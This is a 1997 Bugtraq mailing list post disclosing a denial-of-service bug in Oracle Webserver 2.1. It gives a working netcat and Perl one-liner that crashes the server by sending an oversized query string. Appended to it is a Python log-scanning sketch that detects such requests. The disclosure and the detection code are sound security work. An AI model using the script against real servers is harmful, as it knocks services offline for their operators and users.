
Bugtraq mailing list archives

DoS against Oracle Webserver 2.1 with PL/SQL stored procedures
From: jas () PDC KTH SE (Simon Josefsson)
Date: Wed, 23 Jul 1997 00:15:31 +0200


Fellow bugtraqers, I stumbled over this tonight.  It's a DoS-attack
against an Oracle Webserver 2.1 that serves PL/SQL stored procedures.

The server dumps quietly, I haven't found anything in the logs. v2.0
does not seem to exhibit this behaviour (v2.1 is the latest, but many
sites seem to still run v2.0).

I'm sorry if this is old news (but I'd appreciate it if someone told me
if there is a bugfix somewhere).

(PL/SQL is, simply put, a scripting language within the Oracle database)

---
#!/bin/sh
#
# requires Perl and NetCat.
#
# usage:
#       prg <host> <port> <path>
#
# example:
#       # ./prg your.own.domain.com 80 /ows-bin
#
# if you have the PL/SQL stored procedure in /ows-bin/.
#
perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3"|nc $1 $2
---

S.
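
A detection sketch for the request shape shown in the post, added here as an example and not part of the original message: it scans Common Log Format lines for requests under the PL/SQL path whose query string is oversized. Since the post reports nothing in the server's own logs, the lines are assumed to come from a proxy or logging front end placed before the web server; the 1024-character limit, the function names and the sample lines are assumptions.

```python
import re
from itertools import groupby
from urllib.parse import urlsplit

# Assumed values, not from the original post: the post only shows that a
# 2600-character parameter value is enough, not the smallest length that is.
MAX_QUERY_LEN = 1024             # conservative alerting limit (assumption)
PLSQL_PREFIXES = ("/ows-bin/",)  # path taken from the post's usage example

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\S+) (\S+)')

def longest_run(s):
    """Length of the longest run of one repeated character in s."""
    return max((len(list(g)) for _, g in groupby(s)), default=0)

def suspicious(line, max_query=MAX_QUERY_LEN, prefixes=PLSQL_PREFIXES):
    """Return a finding dict for an oversized PL/SQL request, else None."""
    m = CLF.match(line)
    if not m:
        return None
    client, when, request, status, _ = m.groups()
    parts = request.split(" ")
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    # Only requests routed to stored procedures with a long query are flagged.
    if not url.path.startswith(prefixes) or len(url.query) <= max_query:
        return None
    return {"client": client, "time": when, "path": url.path,
            "query_len": len(url.query), "longest_run": longest_run(url.query),
            "status": status}

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [23/Jul/1997:00:01:02 +0200] "GET /ows-bin/hr/list?dept=10 HTTP/1.0" 200 512',
    '192.0.2.77 - - [23/Jul/1997:00:03:09 +0200] "GET /ows-bin/fnord?foo=' + "a" * 2600 + ' HTTP/1.0" 502 0',
    '192.0.2.10 - - [23/Jul/1997:00:04:00 +0200] "GET /index.html?' + "x" * 3000 + ' HTTP/1.0" 200 90',
]

def scan(lines):
    """Return the findings for every flagged line, in input order."""
    return [f for f in map(suspicious, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The `longest_run` field helps triage: a long query made almost entirely of one repeated character is padding rather than a legitimate parameter set.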


